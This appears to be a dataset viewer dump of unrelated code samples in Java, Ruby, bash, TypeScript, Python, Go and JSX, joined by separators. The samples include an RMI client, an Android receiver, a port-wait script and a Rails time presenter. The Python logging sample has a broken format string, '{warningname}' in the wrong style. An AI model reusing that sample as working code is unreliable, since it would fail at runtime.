double random = 0;
System.out.print("\nClient initialization....");
stub.init(seed1,seed2,seed3);
System.out.println("ok\n");
for (int i = 0; i < 10; i++) {
random = stub.produce();
System.out.println("Random" + i + " = " + random);
}
System.out.println("\nClient terminated.\n");
stub.__disconnect();
} catch( Exception e) {
System.out.println("Exception :");
e.printStackTrace();
}
}
}
|
sed -i '/^<\/body>/e cat ./analytics/analytics-fragment.txt' ./build/index.html |
An array can provide fast search operation, but not fast add/delete operation. A binary search tree provides fast search operation and the add/delete operations are also quite fast. |
<reponame>thushanperera95/Find-My-Phone<gh_stars>1-10
package com.thunderboltsoft.findmyphone.receivers;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.widget.Toast;
import com.thunderboltsoft.findmyphone.activites.FindMyPhoneDialogActivity;
public class PopupBroadcastReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if (intent.getAction().equals("testingkaozgamer")) {
Toast.makeText(context, "Testing Broadcast", Toast.LENGTH_LONG).show();
Intent i = new Intent(context, FindMyPhoneDialogActivity.class);
i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(i);
}
}
}
|
package me.mrdaniel.adventuremmo.utils;
import org.spongepowered.api.Server;
import org.spongepowered.api.block.BlockTypes;
import org.spongepowered.api.entity.living.player.Player;
import org.spongepowered.api.text.Text;
import org.spongepowered.api.util.blockray.BlockRay;
import org.spongepowered.api.util.blockray.BlockRayHit;
import org.spongepowered.api.world.Location;
import org.spongepowered.api.world.World;
import javax.annotation.Nonnull;
import java.util.Optional;
public class ServerUtils {
public static void broadcast(@Nonnull final Server server, @Nonnull final Text message) {
server.getOnlinePlayers().forEach(p -> p.sendMessage(message));
}
@Nonnull
public static Optional<Location<World>> getFirstBlock(@Nonnull final Player p) {
for (BlockRayHit<World> worldBlockRayHit : BlockRay.from(p).distanceLimit(50)) {
Location<World> loc = worldBlockRayHit.getLocation();
if (loc.getBlockType() != BlockTypes.AIR) {
return Optional.of(loc);
}
}
return Optional.empty();
}
} |
=begin
#RadioManager
#RadioManager
OpenAPI spec version: 2.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for RadioManagerClient::UserResultSettings
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'UserResultSettings' do
before do
# run before each test
@instance = RadioManagerClient::UserResultSettings.new
end
after do
# run after each test
end
describe 'test an instance of UserResultSettings' do
it 'should create an instance of UserResultSettings' do
expect(@instance).to be_instance_of(RadioManagerClient::UserResultSettings)
end
end
describe 'test attribute "show_side_bar"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "show_social_bar"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "show_checkbox_column"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "show_time_column"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "show_speech_time"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "zoom_factor"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
|
#!/usr/bin/env bash
port="$1"
echo -n "Waiting for Port: $port "
while ! nc -vz localhost "$port" ; do
echo -n "."
sleep 0.1
done
echo ""
echo "Done!"
|
import { BadRequestException, Injectable } from '@nestjs/common';
import { InjectRepository } from '@nestjs/typeorm';
import { Repository } from 'typeorm';
import { AddressDto } from './address.dto';
import { Address } from './address.entity';
import * as CeepCoords from 'coordenadas-do-cep';
@Injectable()
export class AddressService {
constructor(@InjectRepository(Address) private repo: Repository<Address>) {}
public async createOne(dto: AddressDto): Promise<Address> {
if (!dto.establishment && !dto.user) {
throw new BadRequestException(
'É obrigatório que o endereço tenha ou um estabelecimento ou um usuário',
);
}
const address: Address = await this.repo.save((dto as unknown) as Address);
return this.repo.findOne(address.id, {
relations: ['user', 'establishment'],
});
}
public async updateAddress(id: string, address: Address): Promise<Address> {
await this.repo.update(id, address);
return this.repo.findOne(address.id, {
relations: ['user', 'establishment'],
});
}
public async getCep(cep: string) {
return CeepCoords.getByCep(cep);
}
}
|
import { Component, Input } from '@angular/core';
import { InheritedEnvVarFormElement } from './inherited-env-var-form-element';
@Component({
selector: 'app-inherited-env-vars-form-element',
templateUrl: './inherited-env-vars-form-element.component.html',
styles: [],
})
export class InheritedEnvVarsFormElementComponent {
@Input() inheritedEnvVars: InheritedEnvVarFormElement[];
@Input() availableEnvVarNames: string[];
addInheritedEnvVar(): void {
this.inheritedEnvVars.push({
name: '',
alias: '',
});
}
deleteInheritedEnvVar(i: number): void {
this.inheritedEnvVars.splice(i, 1);
}
trackByIndex(index: number, obj: any): any {
return index;
}
}
|
import logging
class TextSearchApp:
def __init__(self, timedivider=1000, loglevel='INFO'):
self.timedivider = timedivider
self.loglevel = loglevel
self.logger = None
def setup_logger(self):
log_format = '{relativeCreated:8.2f} s {warningname}| {message}'
logging.basicConfig(format=log_format, level=self.loglevel)
self.logger = logging.getLogger(__name__)
def search_corpus(self, corpus):
if self.logger is None:
self.setup_logger()
for text in corpus:
self.logger.info('Searching for: %s', text)
# Demonstration of usage
if __name__ == "__main__":
app = TextSearchApp()
app.search_corpus(['keyword1', 'keyword2', 'keyword3']) |
package main
import (
"fmt"
"log"
"os"
"os/signal"
"runtime/debug"
"syscall"
srv "github.com/moooofly/dms-detector/pkg/servitization"
"github.com/moooofly/dms-detector/probe"
"github.com/moooofly/dms-detector/router"
)
func main() {
if err := srv.Init(); err != nil {
log.Fatalf("err : %s", err)
}
go func() {
if err := router.Launch(); err != nil {
log.Fatalf("err : %s", err)
}
}()
if srv.Pbi != nil && srv.Pbi.S != nil {
Clean(&srv.Pbi.S)
} else {
Clean(nil)
}
}
func Clean(s *probe.Probe) {
signalChan := make(chan os.Signal, 1)
cleanupDone := make(chan bool)
signal.Notify(signalChan,
os.Interrupt,
syscall.SIGHUP,
syscall.SIGINT,
syscall.SIGTERM,
syscall.SIGQUIT)
go func() {
defer func() {
if e := recover(); e != nil {
fmt.Printf("crashed, err: %s\nstack:\n%s", e, string(debug.Stack()))
}
}()
for range signalChan {
log.Println("Received an interrupt, stopping probes...")
if s != nil && *s != nil {
(*s).Clean()
}
srv.Teardown()
cleanupDone <- true
}
}()
<-cleanupDone
os.Exit(0)
}
|
class DcTimePresenter
include ActionView::Helpers::TextHelper
NULL = " ".html_safe.freeze
FORMAT = "%B %d, %Y %r".freeze
TIME_ZONE_NAME = 'Eastern Time (US & Canada)'.freeze
attr_reader :time
def initialize(time)
@time = time
end
def self.convert(time)
new(time).convert
end
def self.parse(time)
time_zone.parse(time)
end
def self.convert_and_format(time, format = FORMAT, timezone_label: true)
new(time).convert_and_format(format, timezone_label: timezone_label)
end
def self.format(time, format = FORMAT)
new(time).format(format)
end
def self.time_zone
ActiveSupport::TimeZone[TIME_ZONE_NAME]
end
def convert
return unless time
time.in_time_zone(time_zone)
end
def format(format)
"#{time.strftime(format)} #{timezone_string}"
end
def convert_and_format(format = FORMAT, timezone_label: true)
if time
str = convert.strftime(format)
str += " #{timezone_string}" if timezone_label
str
else
NULL
end
end
def relative_time
time_diff = (time - Time.now).to_i
abs_time_diff = time_diff.abs
if abs_time_diff < 24.hours
relative_time = if abs_time_diff > 3600
pluralize(abs_time_diff / 3600, "hour")
else
pluralize(abs_time_diff / 60, "minute")
end
if time_diff.positive?
"in #{relative_time}"
else
"#{relative_time} ago"
end
else
date = convert_and_format('%b %-d, %Y', timezone_label: false)
time = convert_and_format('%-l:%M %p')
"on #{date} at #{time}"
end
end
def time_zone
self.class.time_zone
end
def timezone_string
convert.zone
end
end
|
import React from 'react'
import styled from "styled-components"
import Section from './Section'
function Home() {
return (
<Container>
<Section
title="Model S"
description="Order Online for Touchless Delivery"
backgroundImg="model-s.jpg"
leftBtnText="Exixting inventory"
/>
{/* <Section/>
<Section/> */}
</Container>
)
}
export default Home
const Container = styled.div`
height: 100vh;
`
|
package engine.visualization;
import engine.entities.Entity;
import javafx.scene.Group;
import javafx.scene.control.ChoiceBox;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.scene.shape.Line;
import javafx.scene.text.Text;
import javafx.scene.text.TextBoundsType;
import java.util.ArrayList;
import java.util.List;
public class Visualizer {
private static final double RADIUS = 75;
private static final String FONT = "-fx-font-family: \"Georgia\";" + "-fx-font-size: 18px;";
private Entity entity;
private Visualizer parentVisualizer;
private String UID;
private Group group;
private List<Visualizer> childrenList;
private List<Line> lines;
private int numChildren;
public Visualizer(Entity entity, Visualizer parentVisualizer){
this.entity = entity;
this.parentVisualizer = parentVisualizer;
this.UID = entity.UIDforObject();
this.group = new Group();
group.relocate(0, 0);
childrenList = new ArrayList<>();
lines = new ArrayList<>();
numChildren = entity.getChildren().size();
initialize();
}
private void initialize(){
Circle root = addCircle(0, 0, RADIUS);
styleRoot(root);
addText(UID, root);
addChildren();
}
protected Circle addCircle(double centerX, double centerY, double radius){
Circle circle = new Circle(centerX, centerY, radius);
group.getChildren().add(circle);
return circle;
}
protected void addText(String string, Circle circle) {
Text text = new Text(circle.getCenterX() - 18.0, circle.getCenterY(), string.substring(0, 5));
text.setBoundsType(TextBoundsType.VISUAL);
text.setStyle(FONT);
group.getChildren().add(text);
}
private void addChildren(){
entity.getChildren().forEach(e -> {childrenList.add(new Visualizer(e, this));});
}
private void styleRoot(Circle circle){
circle.setStroke(Color.BLACK);
circle.setFill(Color.WHITE);
}
private void styleParent(Circle circle) {
circle.setFill(Color.CORNFLOWERBLUE);
}
protected void styleChild(Circle circle) {
circle.setFill(Color.ORCHID);
}
protected ChoiceBox<String> addChoiceBox(Circle circle){
ChoiceBox<String> choiceBox = new ChoiceBox<>();
circle.setFill(Color.BISQUE);
choiceBox.setVisible(false);
choiceBox.setLayoutX(circle.getCenterX());
choiceBox.setLayoutY(circle.getCenterY());
group.getChildren().add(choiceBox);
choiceBox.toFront();
return choiceBox;
}
public Visualizer getParentVisualizer(){return parentVisualizer;}
public List<Visualizer> getChildrenList(){return childrenList;}
public Group getGroup(){return group;}
public List<Line> getLines(){return lines;}
public int getNumChildren(){return numChildren;}
public String getUID(){return UID;}
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.